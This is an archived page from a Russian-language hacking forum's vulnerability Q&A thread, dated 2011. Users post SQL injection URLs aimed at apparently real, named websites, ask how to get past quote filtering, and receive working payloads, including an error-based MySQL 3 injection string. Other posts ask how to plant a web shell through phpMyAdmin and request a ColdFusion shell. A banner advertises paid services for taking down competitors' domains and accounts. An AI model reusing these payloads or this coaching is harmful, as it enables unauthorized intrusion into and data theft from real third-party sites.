УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1658 из 2438

1658

Опции темы

Поиск в этой теме

Опции просмотра

#16571

11.03.2011, 15:20

fl00der

Постоянный

Регистрация: 17.12.2008

Сообщений: 353

Провел на форуме:
919131

Репутация: 74

Привет.

Если не трудно, помогите, пожалуйста, раскрутить.

http://www.orlyba[...:::G00GLE:::...]or.co.il/catin.asp?productid=163%27&catid=31&Contact_02=No

#16572

11.03.2011, 17:12

asql

Guest

Сообщений: n/a

Провел на форуме:
8829

Репутация: -3

http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+

идет фильтрация кавычек...

как можно обойти?

заранее спс

и вот еще интересная

http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*

#16573

11.03.2011, 17:45

foozzi

Новичок

Регистрация: 13.04.2010

Сообщений: 0

Провел на форуме:
1350

Репутация: 0

как залить шелл если имеется доступ только к pma? права root

#16574

11.03.2011, 18:57

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от foozzi

foozzi said:
как залить шелл если имеется доступ только к pma? права root

/thread133925-phpmyadmin+shell.html

#16575

11.03.2011, 20:18

freezed

Guest

Сообщений: n/a

Провел на форуме:
31258

Репутация: 7

Цитата:

Сообщение от asql

asql said:
http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
идет фильтрация кавычек...
как можно обойти?
заранее спс

а кавычки тут и не нужны, параметр-то числовой

почему не работает юнион:

http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true

Цитата:

Сообщение от asql

asql said:
и вот еще интересная
http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*

помимо гета есть еще и пост

#16576

11.03.2011, 20:29

asql

Guest

Сообщений: n/a

Провел на форуме:
8829

Репутация: -3

Цитата:

Сообщение от None

почему не работает юнион:
http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true

не катит, выдает

Can't execute query SELECT * FROM families WHERE CatID=32 and substring(version(),1,1)=3 true AND date_archived IS NULL ORDER BY orderval

Error: You have an error in your SQL syntax near 'true AND date_archived IS NULL ORDER BY orderval' at line 1

может я что то не так делаю... хз..

#16577

11.03.2011, 20:46

freezed

Guest

Сообщений: n/a

Провел на форуме:
31258

Репутация: 7

Цитата:

Сообщение от Moriarty

Moriarty said:

Цитата:

Сообщение от freezed

freezed said:
почему не работает юнион:

Может потому, что его не было в 3 ветке?! =\

" if author else f"

Цитата:

Moriarty said:

Цитата:

Сообщение от freezed

freezed said:
почему не работает юнион:

Может потому, что его не было в 3 ветке?! =\

а где ты там вопрос увидел?

#16578

11.03.2011, 21:09

asql

Guest

Сообщений: n/a

Провел на форуме:
8829

Репутация: -3

Цитата:

Сообщение от Moriarty

Moriarty said:
Не загоняй! true к запросу не относится! Это означает что мускул 3ей ветки!
Может потому, что его не было в 3 ветке?! =\

ввожу

http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3

выдает норм страницу...

Вы строго не судите меня, я новичок в этом святом деле=)

и если можно , то прошу объяснить принцып действия тут вот этого

Цитата:

Сообщение от None

substring(version(),1,1)=3

именно подбор полей как происходит? типа этого?

Цитата:

Сообщение от None

substring(1)=1
substring(1,2)=2
substring(1,2,3)=3

или дайте линк...

#16579

11.03.2011, 21:27

aka_zver

Постоянный

Регистрация: 17.09.2009

Сообщений: 775

Провел на форуме:
3132379

Репутация: 1069

Отправить сообщение для aka_zver с помощью ICQ

Отправить сообщение для aka_zver с помощью AIM

Отправить сообщение для aka_zver с помощью MSN

Отправить сообщение для aka_zver с помощью Yahoo

Цитата:

Сообщение от asql

asql said:
ввожу
http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3
выдает норм страницу...
Вы строго не судите меня, я новичок в этом святом деле=)
и если можно , то прошу объяснить принцып действия тут вот этого
именно подбор полей как происходит? типа этого?
или дайте линк...

/thread18552-blind+sql.html - вот это

https://rdot.org/forum/showthread.php?t=245 - потом это

https://rdot.org/forum/showthread.php?t=503 - и напоследок

согласно 3 ссылке и описанному там методу MySQL 3 error based inj, раскручивать её можно через вывод в ошибке, т.е (лишние пробелы, вставляемые форумом, убрать)

Код:

Code:
http://www.hawkingtech.com/products/index.php?CatID=32+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+

#16580

11.03.2011, 22:12

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Интересует полноценный шелл на Macromedia ColdFusion.

Страница 1658 из 2438

1658

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход